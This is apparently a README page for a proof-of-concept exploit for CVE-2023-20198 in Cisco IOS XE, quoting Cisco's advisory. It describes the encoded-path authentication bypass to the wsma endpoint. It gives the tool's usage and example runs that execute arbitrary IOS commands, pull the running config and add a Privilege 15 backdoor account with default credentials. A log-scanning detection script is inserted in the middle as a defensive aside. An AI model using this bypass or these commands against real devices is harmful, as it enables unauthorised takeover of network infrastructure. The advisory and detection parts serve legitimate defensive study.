
CVE-2023-20198 PoC — Cisco IOS XE Software security vulnerability

Associated Vulnerability
Title: Cisco IOS XE Software security vulnerability (CVE-2023-20198)
Description: Cisco is providing an update for the ongoing investigation into observed exploitation of the web UI feature in Cisco IOS XE Software. We are updating the list of fixed releases and adding the Software Checker. Our investigation has determined that the actors exploited two previously unknown issues. The attacker first exploited CVE-2023-20198 to gain initial access and issued a privilege 15 command to create a local user and password combination. This allowed the user to log in with normal user access. The attacker then exploited another component of the web UI feature, leveraging the new local user to elevate privilege to root and write the implant to the file system. Cisco has assigned CVE-2023-20273 to this issue. CVE-2023-20198 has been assigned a CVSS Score of 10.0. CVE-2023-20273 has been assigned a CVSS Score of 7.2. Both of these CVEs are being tracked by CSCwh87343.
Description
CVE-2023-20198 Exploit PoC
Readme
# CVE-2023-20198
Exploit PoC for CVE-2023-20198

## Description
CVE-2023-20198 is characterized by improper path validation that bypasses Nginx filtering to reach the `webui_wsma_http` web endpoint without requiring authentication.<br>
By bypassing authentication to the endpoint, an attacker can execute arbitrary Cisco IOS commands or issue configuration changes with Privilege 15 rights.<br>
Cisco's investigation into active exploitation of the previously undisclosed vulnerability revealed that threat actors first exploited CVE-2023-20198 to add a new user with Privilege level 15. Further attacks involved exploitation of CVE-2023-20273 to escalate to the underlying Linux OS `root` user and facilitate implantation.<br>

This PoC exploits CVE-2023-20198 through two different XML SOAP endpoints:<br>
The vulnerability check, config, and command execution options all target the `cisco:wsma-exec` SOAP endpoint and insert commands into the `execCLI` element tag.<br>
The add user option targets the `cisco:wsma-config` SOAP endpoint to issue a configuration change and add the Privilege 15 account. This endpoint could be [ab]used to make other configuration changes, but that's outside the scope of this PoC.<br>

Abuse of the `cisco:wsma-exec` SOAP endpoint came from the nuclei template.<br>
Abuse of the `cisco:wsma-config` SOAP endpoint came from the horizon3ai PoC.<br>

Note: I did not conduct any of the original research or PoC development for this CVE. See the references section for credit.
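The bypass described above hides the `webui_wsma_http` endpoint behind percent-encoding (the usage output later in this README shows the `%2577eb%2575i_%2577sma_Http` form). The following detection helper is an added example, not part of this PoC or of any Cisco tooling: it normalises request paths by decoding repeatedly and flags requests that only resolve to the wsma endpoint after decoding. The Common Log Format and the sample entries are assumed and constructed; adapt the regex to whatever your proxy or syslog collector actually records.

```python
import re
from urllib.parse import unquote

# Endpoint named in the README; the bypass works by hiding it behind percent-encoding.
WSMA_ENDPOINT = "webui_wsma_http"

# Assumed Common Log Format, as a fronting proxy or syslog collector might record it.
LOG_LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

def normalise_path(path: str, max_rounds: int = 3) -> tuple[str, int]:
    """Percent-decode until the path stops changing; return (decoded path, rounds needed)."""
    rounds, current = 0, path
    while rounds < max_rounds:
        decoded = unquote(current)
        if decoded == current:
            break
        current, rounds = decoded, rounds + 1
    return current, rounds

def is_wsma_bypass_request(path: str) -> bool:
    """True when the path only reveals the wsma endpoint after decoding (case-insensitive).
    A literal /webui_wsma_http request is left to the normal auth check; the encoded
    form is the one the filter is documented to miss."""
    decoded, rounds = normalise_path(path.split("?", 1)[0])
    return rounds >= 1 and WSMA_ENDPOINT in decoded.lower()

def scan_log(lines):
    """Return (source IP, raw path, decoded path) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and is_wsma_bypass_request(m.group("path")):
            hits.append((m.group("src"), m.group("path"), normalise_path(m.group("path"))[0]))
    return hits

# Constructed sample entries; the first path matches the double-encoded form shown in this README.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2023:10:01:02 +0000] "POST /%2577eb%2575i_%2577sma_Http HTTP/1.1" 200 512',
    '198.51.100.9 - - [18/Oct/2023:10:01:09 +0000] "POST /%77ebui_wsma_http HTTP/1.1" 200 128',
    '192.0.2.7 - - [18/Oct/2023:10:02:00 +0000] "GET /webui/ HTTP/1.1" 200 4096',
    '192.0.2.7 - - [18/Oct/2023:10:02:05 +0000] "POST /webui_wsma_http HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for src, raw, decoded in scan_log(SAMPLE_LOG):
        print(f"{src} {raw} -> {decoded}")
```

Pair a hit with a `show running-config` review for unexpected `username ... privilege 15` lines, since the README notes that user creation is the observed first step.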

## Usage
```
usage: exploit.py [-h] (-t targetIP | -l targetFile) [-https] (-c | -g | -e command | -a | -d) [-u newUserName] [-p newUserPass] [-o outputFile] [-v]

CVE-2023-20198 Exploit PoC

options:
  -h, --help      show this help message and exit
  -t targetIP     Target IP Address
  -l targetFile   File containing IP Addresses (-c only)
  -https          Use https
  -c              [X] Check for vulnerability
  -g              [X] Get Cisco IOS running config
  -e command      [X] Execute Cisco IOS command
  -a              [X] Add new priv 15 user
  -d              [X] Remove priv 15 user
  -u newUserName  [Optional] user name for -a or -d. Default: shellsmoke
  -p newUserPass  [Optional] new user pass for -a. Default: pwned
  -o outputFile   Write output to file
  -v              Increase verbosity
```

### Vulnerability check
To check for CVE-2023-20198, `-c` attempts to exploit the vulnerability and execute `uname -a`.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -c

Testing for vulnerability
Target IP:      10.0.0.1
Target URL:     http://10.0.0.1/%2577eb%2575i_%2577sma_Http
Vulnerable:     True
IOS Ver:        <REDACTED> IOS 16.6 Cisco IOS Software [Everest], Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version 16.6.5, RELEASE SOFTWARE (fc3)
```

### Get Cisco Config
The `-g` option executes `sh run` to pull the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -g

Building configuration...
Current configuration : 6988 bytes
!
...
!
version 16.6
no service pad
service timestamps debug datetime msec
service timestamps log datetime msec
...
```

### Execute commands
Arbitrary Cisco IOS commands can be executed with the `-e` option.<br>
Use extreme caution when using this to make configuration changes: there is no input validation, and changes are applied immediately to the running config.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -e 'sh log'

Selected Target:        10.0.0.1
Running in Exec Mode
Executing Command:      sh log

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

Syslog logging: enabled (0 messages dropped, 1 messages rate-limited, 0 flushes, 0 overruns, xml disabled, filtering disabled)
No Active Message Discriminator.
No Inactive Message Discriminator.
    Console logging: level debugging, 5368 messages logged, xml disabled,
                     filtering disabled
...
```

### Add user
The `-a` option can be used to create a new Privilege 15 user account, optionally specifying the account name and password with `-u` and `-p` respectively.<br>
Example:
```
# ./exploit.py -t 10.0.0.1 -a -u shellsmoke -p pwned

Selected Target:        10.0.0.1
Adding New Privilege 15 User
New User Name:  shellsmoke
New User Pass:  pwned

Sending exploit to target URL:  http://10.0.0.1/%2577eb%2575i_%2577sma_Http

No reportable output from adding users
Check verbose ouput or get running config
Done.
```

### Del user
The `-d` option can be used to remove a user account from the device, and respects the username specified with `-u`.<br>
Take care to make sure you aren't deleting a legitimate account.<br>
This was added for instances where shell/webui access to an exploited Cisco device cannot be obtained. It was observed that adding a Privilege 15 user does not grant webui access and could leave exploitation artifacts on hosts.<br>

## References
[Cisco Advisory](https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z)<br>
[horizon3ai CVE-2023-20198 research](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-theory-crafting/)<br>
[horizon3ai CVE-2023-20198 PoC](https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/)<br>
[nuclei CVE-2023-20198 template](https://cloud.projectdiscovery.io/public/CVE-2023-20198) (Authors: iamnoooob, rootxharsh, pdresearch)<br>
[LeakIX CVE-2023-20273 PoC](https://blog.leakix.net/2023/10/cisco-root-privesc/)<br>

## TODO
- [ ] https support
- [ ] CVE-2023-20273 Implementation
- [ ] Timeout and error handling

## Disclaimer
The code contained in this project is intended only for research and usage on systems where the user has explicit authorization.<br>
The author of this project is not responsible or liable for misuse of the software.<br>
Use responsibly and don't be evil

File Snapshot

```
[4.0K] /data/pocs/5840514e714742bf0bf4d7119cae448e3c9f6f86
├── [ 17K] exploit.py
└── [5.7K] README.md

0 directories, 2 files
```